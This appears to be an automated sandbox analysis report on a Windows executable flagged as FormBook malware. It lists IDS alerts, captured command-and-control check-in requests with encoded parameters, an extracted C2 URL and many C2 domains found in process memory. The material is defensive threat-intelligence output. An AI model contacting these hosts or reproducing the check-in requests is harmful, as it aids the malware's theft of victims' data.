Source: Yara match	File source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for sample

Source: hj3YCvtlg7.exe

Joe Sandbox ML: detected

Source: hj3YCvtlg7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: hj3YCvtlg7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: ipconfig.pdb source: hj3YCvtlg7.exe, 00000005.00000002.1405267878.0000000001298000.00000004.00000020.00020000.00000000.sdmp, hj3YCvtlg7.exe, 00000005.00000002.1405192974.0000000001270000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: hj3YCvtlg7.exe, 00000005.00000002.1405267878.0000000001298000.00000004.00000020.00020000.00000000.sdmp, hj3YCvtlg7.exe, 00000005.00000002.1405192974.0000000001270000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3825630510.0000000000C70000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: UuoN.pdbSHA256 source: hj3YCvtlg7.exe
Source:	Binary string: wntdll.pdbUGP source: hj3YCvtlg7.exe, 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1406723918.0000000000971000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1404652357.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: hj3YCvtlg7.exe, hj3YCvtlg7.exe, 00000005.00000002.1405518091.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000007.00000002.3826243110.0000000002E1E000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1406723918.0000000000971000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000003.1404652357.00000000007C8000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000007.00000002.3826243110.0000000002C80000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: UuoN.pdb source: hj3YCvtlg7.exe

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49716 -> 13.248.169.48:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49718 -> 104.21.56.10:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49719 -> 102.134.40.151:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49720 -> 3.33.130.190:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49721 -> 13.248.169.48:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49722 -> 66.147.240.91:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.9:49723 -> 172.67.154.171:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.yoursweets.online/vr01/

Source: global traffic	HTTP traffic detected: GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=PLKcE8xpvhyOzOxKkeL/+DL1kNIcq39IIYnP8OO3XXjl6ci5rXmACxw/pz+4M+mlciA/ HTTP/1.1Host: www.kidscircle.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vr01/?uTm4=CRIcXgDta+9JTffevem10+yBm+uKfejT3UejFVr1Q2sKU73ve+2FIZL4fAb3NdJYnMZe&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.bombslot-42.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vr01/?uTm4=p/xcNqzHhW+jsc+DeauMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRzL3IBjum3b&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.mingshengglass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vr01/?uTm4=md7YwaIYFUjajARP8H7AA5qkzU4U6St+AjWqtcGBvmy8i5h4BhyP/cD7LiVxVrOxyfa+&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.ethicai.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=om+RAj8+1U0Z4Q5rkk8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuS9IxznZs+QL HTTP/1.1Host: www.owletbaby.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=wFZ5enF1tq9XrqHWNXhfStMJiblJh5bHmGRWjDpakqkf/10aPf5zMfbio2tqs2yXyxpi HTTP/1.1Host: www.oregonjobs.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vr01/?uTm4=4lP9+b8r1hHYuPjiih6w+ijrcjXpUPjRDd99FwKlJ6rbETvBe77stQ4feUetoD8uHBUT&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.helyibudapest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 13.248.169.48 13.248.169.48
Source: Joe Sandbox View	IP Address: 3.33.130.190 3.33.130.190

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: sun-asnSC sun-asnSC
Source: Joe Sandbox View	ASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\explorer.exe

Code function: 6_2_0FDA6F82 getaddrinfo,setsockopt,recv,

6_2_0FDA6F82

Source: global traffic	HTTP traffic detected: GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=PLKcE8xpvhyOzOxKkeL/+DL1kNIcq39IIYnP8OO3XXjl6ci5rXmACxw/pz+4M+mlciA/ HTTP/1.1Host: www.kidscircle.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vr01/?uTm4=CRIcXgDta+9JTffevem10+yBm+uKfejT3UejFVr1Q2sKU73ve+2FIZL4fAb3NdJYnMZe&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.bombslot-42.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vr01/?uTm4=p/xcNqzHhW+jsc+DeauMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRzL3IBjum3b&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.mingshengglass.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vr01/?uTm4=md7YwaIYFUjajARP8H7AA5qkzU4U6St+AjWqtcGBvmy8i5h4BhyP/cD7LiVxVrOxyfa+&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.ethicai.proConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=om+RAj8+1U0Z4Q5rkk8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuS9IxznZs+QL HTTP/1.1Host: www.owletbaby.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=wFZ5enF1tq9XrqHWNXhfStMJiblJh5bHmGRWjDpakqkf/10aPf5zMfbio2tqs2yXyxpi HTTP/1.1Host: www.oregonjobs.coConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /vr01/?uTm4=4lP9+b8r1hHYuPjiih6w+ijrcjXpUPjRDd99FwKlJ6rbETvBe77stQ4feUetoD8uHBUT&R2M=NjOhAHzH5LxTCNrP HTTP/1.1Host: www.helyibudapest.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.kidscircle.shop

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Apr 2024 13:23:24 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sj4kR%2FWxTqizZeKzuOtgPoR4qc%2B9UsS9LTHntpDXGYTM7Cf0swEcQjz%2Bf2zU0AMtmKZwgXJYXOfOZdLKBnp6XNrdXPfiUV2l9vKbqirlHETdLc4yuJcepmISOk%2BwVr13SUhP8u8%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8712925ce9d2a534-MIAalt-svc: h3=":443"; ma=86400Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: a2<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 08 Apr 2024 13:25:48 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: explorer.exe, 00000006.00000000.1359952336.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: hj3YCvtlg7.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: hj3YCvtlg7.exe	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: explorer.exe, 00000006.00000000.1359952336.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: explorer.exe, 00000006.00000000.1359952336.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: hj3YCvtlg7.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: explorer.exe, 00000006.00000000.1359952336.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1359952336.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3838977700.0000000008685000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
Source: explorer.exe, 00000006.00000002.3838517721.00000000082D0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.3831292378.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1358564152.0000000007670000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: hj3YCvtlg7.exe	String found in binary or memory: http://tempuri.org/DataSet1.xsd
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bombslot-42.co
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bombslot-42.co/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bombslot-42.co/vr01/www.erabits.com
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.bombslot-42.coReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.elcaporalburley.com
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.elcaporalburley.com/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.elcaporalburley.com/vr01/www.molobeverello.com
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.elcaporalburley.comReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.erabits.com
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.erabits.com/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.erabits.com/vr01/www.mingshengglass.com
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.erabits.comReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ethicai.pro
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ethicai.pro/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ethicai.pro/vr01/www.owletbaby.shop
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.ethicai.proReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.helyibudapest.com
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.helyibudapest.com/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.helyibudapest.com/vr01/www.poseidoncrm.com
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.helyibudapest.comReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jupitr-claim.top
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jupitr-claim.top/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jupitr-claim.top/vr01/www.nicolbauer.com
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.jupitr-claim.topReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kidscircle.shop
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kidscircle.shop/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kidscircle.shop/vr01/www.bombslot-42.co
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.kidscircle.shopReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mayorii.com
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mayorii.com/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mayorii.com/vr01/www.oregonjobs.co
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mayorii.comReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mingshengglass.com
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mingshengglass.com/vr01/
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mingshengglass.com/vr01/www.yoursweets.online
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.mingshengglass.comReferer:
Source: explorer.exe, 00000006.00000003.2292428124.000000000C290000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2291787350.000000000C1FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3843971918.000000000C295000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.molobeverello.com
